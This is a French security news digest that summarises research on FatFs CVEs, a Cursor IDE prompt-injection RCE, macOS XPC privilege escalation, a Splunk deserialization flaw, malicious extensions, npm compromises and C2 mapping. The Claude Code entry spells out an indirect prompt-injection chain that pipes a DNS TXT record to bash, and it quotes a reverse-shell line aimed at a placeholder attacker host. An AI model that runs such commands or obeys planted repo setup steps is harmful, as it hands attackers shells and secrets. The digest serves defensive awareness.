Sept vulnérabilités dans FatFs : impact massif sur l'IoT, l'OT et les systÚmes embarqués

🔍 Contexte PubliĂ© le 1er juillet 2026 par runZero (todb / HD Moore), cet article de recherche documente la dĂ©couverte de sept vulnĂ©rabilitĂ©s dans FatFs, une bibliothĂšque FAT open-source embarquĂ©e trĂšs rĂ©pandue. La recherche a Ă©tĂ© initiĂ©e en mars 2026 en reprenant un audit manuel de 2017, cette fois avec l’aide de GitHub Copilot en mode automatique pour gĂ©nĂ©rer des fuzzers et valider l’exploitabilitĂ©. 🐛 VulnĂ©rabilitĂ©s identifiĂ©es Les sept CVEs sont listĂ©es par ordre de criticitĂ© : ...

3 juillet 2026 Â· 3 min

DuneSlide : Deux vulnérabilités RCE critiques via injection de prompt dans Cursor IDE

🔍 Contexte PubliĂ© le 1er juillet 2026 par Cato AI Labs (blog Cato Networks), cet article prĂ©sente la dĂ©couverte de deux vulnĂ©rabilitĂ©s critiques dans Cursor IDE, un environnement de dĂ©veloppement intĂ©grĂ© basĂ© sur l’IA utilisĂ© par plus de la moitiĂ© des entreprises du Fortune 500. 🚹 VulnĂ©rabilitĂ©s identifiĂ©es Les deux vulnĂ©rabilitĂ©s, regroupĂ©es sous le nom DuneSlide, ont obtenu un score CVSS de 9.8 et ont Ă©tĂ© assignĂ©es les identifiants CVE-2026-50548 et CVE-2026-50549. ...

2 juillet 2026 Â· 3 min

AsyncRAT Family : cartographie de 40 variants RAT et leur infrastructure C2 active

📅 Source : Censys Blog, publiĂ© le 26 juin 2026, par Aidan Holland (Senior Security Researcher, Censys ARC). Contexte AsyncRAT est un cheval de Troie d’accĂšs distant (RAT) open-source pour Windows, publiĂ© en janvier 2019 par le dĂ©veloppeur NYAN-x-CAT sur GitHub. Il constitue la racine d’une famille de malwares ayant engendrĂ© environ 40 variants nommĂ©s Ă  travers trois gĂ©nĂ©rations de forks successifs. Arbre gĂ©nĂ©alogique de la famille La lignĂ©e s’organise ainsi : ...

30 juin 2026 Â· 3 min

macOS : escalade de privilĂšges via exploitation du cache CDHash XPC et injection NIB

🔍 Contexte PubliĂ© le 24 juin 2026 par Hillel Pinto (XM Cyber), cet article prĂ©sente une nouvelle technique d’escalade de privilĂšges macOS permettant Ă  un compte utilisateur standard de dĂ©sactiver des solutions de sĂ©curitĂ© d’entreprise (EDR, MDM) sans droits administrateur, sans exploit noyau et sans dĂ©clencher d’alertes. ⚙ MĂ©canisme technique L’attaque repose sur une chaĂźne d’exploitation en plusieurs Ă©tapes : Exploitation du cache CDHash noyau : un binaire signĂ© lĂ©gitime est lancĂ© pour peupler le cache de confiance du noyau, puis la structure du bundle applicatif est modifiĂ©e pour injecter un payload NIB (Interface Builder) malveillant. HĂ©ritage du contexte de confiance : le code malveillant s’exĂ©cute dans l’espace mĂ©moire du composant signĂ© lĂ©gitime, hĂ©ritant de ses credentials de confiance noyau, ce qui lui permet de communiquer avec les daemons privilĂ©giĂ©s sans authentification. Bridge Objective-C via JXA : pour contourner les limitations d’AppleScript, un bridge multi-Ă©tapes est construit : chargement de OSAKit.framework, transition vers JavaScript for Automation (JXA), accĂšs au bridge Objective-C, manipulation de malloc/free, dispatch_block_create, objc_msgSend, et spoofing de structures Block_layout. MĂ©thodes XPC exposĂ©es exploitĂ©es : runProcessWithCommand:, terminateAppsAndAgents:, ceaseSystemExtensionWithReply: 🎯 Produits impactĂ©s CrowdStrike Falcon Sensor : dĂ©chargement complet du capteur depuis un compte UID 502, terminaison de la surveillance des processus et de la visibilitĂ© rĂ©seau. → DĂ©tection et prĂ©vention ajoutĂ©es, bounty payĂ©. Kandji MDM Agent : dĂ©sactivation permanente via une chaĂźne XPC en deux phases, suppression des gardes EDR et terminaison de l’extension Endpoint Security Framework (ESF). → CVE-2026-39118 assignĂ©, bounty payĂ©, correctif dĂ©ployĂ©. đŸ› ïž Outil associĂ© Le chercheur a dĂ©veloppĂ© XPC Hunter, un framework open-source automatisĂ© de dĂ©couverte des surfaces d’escalade de privilĂšges XPC sur toutes les applications macOS installĂ©es. Sa prĂ©sentation est prĂ©vue Ă  Black Hat US en aoĂ»t 2026. ...

30 juin 2026 Â· 3 min

StegoAd : 119 extensions malveillantes Edge ciblant 2,6 millions d'utilisateurs via stéganographie

🔍 Contexte Le 16 juin 2026, l’équipe Microsoft Edge Extensions Security a publiĂ© une analyse technique dĂ©taillĂ©e de la campagne StegoAd, un portmanteau de steganography et adware. Active depuis au moins 2021, cette campagne a atteint sa phase la plus sophistiquĂ©e entre mars 2024 et avril 2026, impactant environ 2,6 millions d’utilisateurs via 119 extensions malveillantes publiĂ©es sur le Microsoft Edge Add-ons Store. 🎯 Nature de la menace StegoAd est une plateforme de monĂ©tisation et de vol de credentials opĂ©rĂ©e par un acteur non nommĂ© utilisant plus de 90 comptes dĂ©veloppeurs jetables. Les extensions se font passer pour des outils lĂ©gitimes (bloqueurs de publicitĂ©s, VPN, tĂ©lĂ©chargeurs vidĂ©o, traducteurs) tout en embarquant des charges utiles malveillantes activĂ©es aprĂšs un dĂ©lai de dormance de 3 Ă  5,5 jours. ...

30 juin 2026 Â· 6 min

Cellebrite utilisé par les autorités russes pour réprimer l'activiste Andrey Pivovarov

🔍 Contexte PubliĂ© le 25 juin 2026 par le Citizen Lab (UniversitĂ© de Toronto), ce rapport prĂ©sente une analyse forensique dĂ©taillĂ©e de l’utilisation de l’outil Cellebrite UFED par les autoritĂ©s russes contre l’activiste politique Andrey Pivovarov, ancien directeur de l’ONG Open Russia. đŸ“± Incident principal Le 31 mai 2021, Pivovarov est arrĂȘtĂ© Ă  l’aĂ©roport de Saint-PĂ©tersbourg. Ses appareils (iPhone 12 et MacBook) sont confisquĂ©s. L’analyse forensique rĂ©vĂšle avec haute confiance que Cellebrite UFED a Ă©tĂ© utilisĂ© le 17 juin 2021 pour extraire les donnĂ©es de son iPhone, via une connexion USB identifiĂ©e par un Host ID Cellebrite (9016926980658937761372207). ...

29 juin 2026 Â· 3 min

CVE-2026-20251 : RCE via désérialisation jsonpickle dans Splunk Secure Gateway (CVSS 8.8)

🔍 Contexte PubliĂ© le 29 juin 2026 sur GitHub par le chercheur Fady Oueslati (ReactiveZero Security Research), ce dĂ©pĂŽt documente la vulnĂ©rabilitĂ© CVE-2026-20251 affectant Splunk Secure Gateway (SSG), avec un score CVSS 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). Un patch est disponible. 🐛 VulnĂ©rabilitĂ© La faille repose sur une dĂ©sĂ©rialisation non sĂ©curisĂ©e via jsonpickle dans le composant SSG. Le flux d’exploitation est le suivant : Un attaquant authentifiĂ© (faibles privilĂšges) Ă©crit un document malveillant dans la collection KV Store mobile_alerts via l’API REST Splunk. SSG lit ce document dans alerts_request_processor.py et le soumet au validateur check_alert_data_valid_json(). Le validateur court-circuite dĂšs qu’il rencontre la clĂ© py/object avec une valeur commençant par spacebridgeapp, retournant True sans inspecter les clĂ©s suivantes. Le document est ensuite passĂ© Ă  jsonpickle.decode(..., safe=True), qui exĂ©cute le gadget py/reduce prĂ©sent dans la clĂ© notification — le flag safe=True ne bloque pas ce chemin de code. 🎯 Impact ExĂ©cution de code arbitraire en tant que compte de service Splunk NĂ©cessite uniquement un login Splunk valide Ă  faibles privilĂšges ConfidentialitĂ©, intĂ©gritĂ© et disponibilitĂ© toutes compromises 📩 Versions affectĂ©es Branche CorrigĂ© dans SSG 3.9.x 3.9.20 SSG 3.10.x 3.10.6 SSG 3.8.x 3.8.67 Splunk Enterprise 10.0.7 / 10.2.4 / 10.4.0+ Instance testĂ©e : SSG 3.9.19 sur Splunk Enterprise 10.0.6 (macOS x86_64). ...

29 juin 2026 Â· 2 min

Injection de prompt indirecte via DNS TXT : compromission totale via Claude Code à l'ouverture d'un dépÎt

🔍 Contexte PubliĂ© le 25 juin 2026 par Andre Hall & Miller Engelbrecht sur le blog de 0DIN (plateforme de bug bounty IA de Mozilla), cet article prĂ©sente une dĂ©monstration technique d’une attaque par injection de prompt indirecte ciblant les outils de dĂ©veloppement agentiques, en particulier Claude Code d’Anthropic. ⚙ MĂ©canisme de l’attaque L’attaque repose sur trois composants enchaĂźnĂ©s, chacun individuellement bĂ©nin : Un dĂ©pĂŽt GitHub normal : un fichier README ou issue dĂ©crit une procĂ©dure d’initialisation standard (pip3 install -r requirements.txt puis python3 -m axiom init). Un package Python qui Ă©choue intentionnellement : le module axiom lĂšve une RuntimeError s’il n’est pas initialisĂ©, incitant l’agent Ă  exĂ©cuter python3 -m axiom init comme correction de routine. Un script d’initialisation qui rĂ©sout un enregistrement DNS TXT : scripts/setup.sh exĂ©cute dig +short TXT _axiom-config.m100.cloud @1.1.1.1 et passe le rĂ©sultat Ă  bash -c. L’enregistrement DNS contient un reverse shell encodĂ© en base64 (bash -i >& /dev/tcp/<attacker-host>/4443 0>&1). đŸ’„ Impact Shell interactif s’exĂ©cutant avec les droits de l’utilisateur dĂ©veloppeur Exfiltration de secrets d’environnement : ANTHROPIC_API_KEY, AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN PossibilitĂ© de persistance (clĂ© SSH, cron job, backdoor) Le payload est invisible : absent du dĂ©pĂŽt, non dĂ©tectable par les scanners statiques, jamais Ă©valuĂ© par l’agent avant exĂ©cution Le payload peut ĂȘtre modifiĂ© Ă  tout moment en Ă©ditant l’enregistrement DNS, sans aucun commit 🎯 Vecteur de diffusion Un simple lien vers le dĂ©pĂŽt partagĂ© dans une offre d’emploi, un tutoriel ou un message Slack suffit Ă  compromettre tout dĂ©veloppeur ouvrant le projet avec Claude Code. ...

29 juin 2026 Â· 3 min

Shai-Hulud : nouvelle vague Hades cible 20 packages npm Leo/RStreams

🔍 Contexte PubliĂ© le 25 juin 2026 par Yair Benamou (JFrog Security Research), cet article documente une nouvelle vague de la campagne Shai-Hulud, dĂ©signĂ©e Hades, ciblant l’écosystĂšme npm Leo/RStreams — une plateforme de streaming d’évĂ©nements AWS-native utilisĂ©e dans des pipelines serverless et CI/CD. 🎯 Packages ciblĂ©s 20 packages npm lĂ©gitimes ont Ă©tĂ© compromis, dont : leo-sdk, leo-auth, leo-aws, leo-logger, leo-config rstreams-metrics, rstreams-shard-util serverless-leo, serverless-convention Packages @immobiliarelabs/backstage-plugin-gitlab-backend, @immobiliarelabs/backstage-plugin-gitlab, @immobiliarelabs/backstage-plugin-ldap-auth-backend, @immobiliarelabs/backstage-plugin-ldap-auth Ces packages totalisaient environ ~127K tĂ©lĂ©chargements dans le mois prĂ©cĂ©dant l’analyse. ...

29 juin 2026 Â· 3 min

Cartographie de l'infrastructure C2 en Europe de l'Est : 3 900+ serveurs sur 302 fournisseurs

🌍 Contexte PubliĂ© le 24 juin 2026 par Hunt.io sur son blog de recherche, cet article prĂ©sente les rĂ©sultats d’une cartographie systĂ©matique de l’infrastructure malveillante en Europe de l’Est, couvrant 10 pays (BiĂ©lorussie, Bulgarie, RĂ©publique tchĂšque, Hongrie, Pologne, Moldavie, Roumanie, Russie, Slovaquie, Ukraine) sur une fenĂȘtre de trois mois (12 mars – 12 juin 2026). 📊 Chiffres clĂ©s 4 331 dĂ©tections malveillantes totales chez 302 fournisseurs distincts 3 923 serveurs C2 (~90,6% des dĂ©tections) 146 posts IOC Hunter, 111 rĂ©pertoires ouverts malveillants, 90 sites de phishing, 61 IOCs publics Friendhosting LTD (Bulgarie) : 2 100 serveurs C2, soit 53,5% de toute l’infrastructure C2 rĂ©gionale Top 5 fournisseurs : Friendhosting (BG, 2100), TimeWeb (RU, 277), PQ Hosting (MD, 175), Neterra (BG, 137), AlexHost (MD, 120) 🩠 Distribution des familles de malwares Keitaro : 1 277 IPs C2 uniques (TDS abusĂ© pour malvertising/phishing) Tactical RMM : 232 C2s (outil lĂ©gitime dĂ©tournĂ©) Acunetix : 173 C2s (infrastructure de reconnaissance) Gophish : 122 C2s Hajime : 106, Mozi : 82 (botnets IoT) Cobalt Strike : 35 vĂ©rifiĂ©s + 44 non vĂ©rifiĂ©s Sliver : 35 🎯 Acteurs de menace et campagnes identifiĂ©s Cloud Atlas APT : IP 146.70.53[.]171 (M247, AS9009, Bulgarie) et plusieurs IPs sur Baxet (AS51659) — ciblage d’entitĂ©s gouvernementales/diplomatiques en Russie et BiĂ©lorussie, exploitation de CVE-2018-0802, phishing ZIP avec LNK/PowerShell INJ3CTOR3 : IP 146.70.129[.]114 (AS9009, RĂ©publique tchĂšque) — campagne de fraude tĂ©lĂ©phonique FreePBX, dropper Bash multi-Ă©tapes, webshell JOMANGY, outil ZenharR JINX-0164 : IP 89.36.224[.]5 (AS9009, Roumanie) — package npm malveillant @velora-dex/sdk v9.4.1, RAT Go minirat, ciblage dĂ©veloppeurs macOS DeFi/Web3 ShinyHunters : IP 176.120.22[.]24 (Proton66 OOO, AS198953, Russie) — exploitation de CVE-2026-35273 (RCE Oracle PeopleSoft 8.61/8.62), ~300 instances ciblĂ©es dans 100+ organisations dont universitĂ©s Nemesys ransomware : IP 141.98.83[.]86 (FlyServers, AS209588) — Mimikatz, LaZagne, outils NirSoft, persistance via clĂ© Run HKCU Ollama Honeypot / CVE-2026-7482 : IP 78.85.31[.]182 (Rostelecom, AS12389) — coinminer, LLMjacking WantToCry ransomware : IP 87.225.105[.]217 (Rostelecom, AS12389) Fluffy Wolf : IP 195.2.67[.]129 (VDSina, AS48282) — phishing ciblant des organisations russes Black Basta : IP 109.172.88[.]38 (VDSina, AS48282) — vishing Teams, spam de registration-bombing, installation AnyDesk Gremlin Stealer (variant Ă©voluĂ©) : IP 194.87.92[.]109 (MTW/JSC Mediasoft, AS48347) — exfiltration, payload XOR dans ressource .NET Pink Extortion Group : IP 185.178.208[.]153 (DDoS-Guard, AS57724) — vol de donnĂ©es Microsoft 365, exfiltration via Microsoft Graph API Silent Ransom Group (SRG) : IP 130.204.1[.]83 (A1 Bulgaria) — infrastructure DNS fast-flux DevilNFC (Android) : IP 185.203.116[.]18 (Belcloud) XenoRAT / Gentlemen Ransomware : IP 92.39.211[.]142 (MTS) Pioneer Kitten (probable) : IP 83.168.110[.]191 (SkyPass Solutions) — exploitation CVE-2026-0257 (Palo Alto GlobalProtect bypass) ProxyCB botnet / TeamSpy : IP 195.62.53[.]253 (IPServer) đŸ—ș RĂ©partition gĂ©ographique des C2 Russie : 929 IPs uniques (45,7%) Pologne : 438 IPs (21,5%) — dispersĂ©es sur de nombreux petits fournisseurs Bulgarie : 298 IPs (14,7%) Roumanie : 199 IPs (9,8%) Ukraine : 170 IPs (8,4%) 📋 Type d’article Publication de recherche CTI Ă  visĂ©e analytique, prĂ©sentant une cartographie systĂ©matique de l’infrastructure malveillante rĂ©gionale via la plateforme Host Radar de Hunt.io, avec des requĂȘtes HuntSQL reproductibles et des exemples d’acteurs actifs. ...

26 juin 2026 Â· 5 min
Derniùre mise à jour le: 4 juillet 2026 📝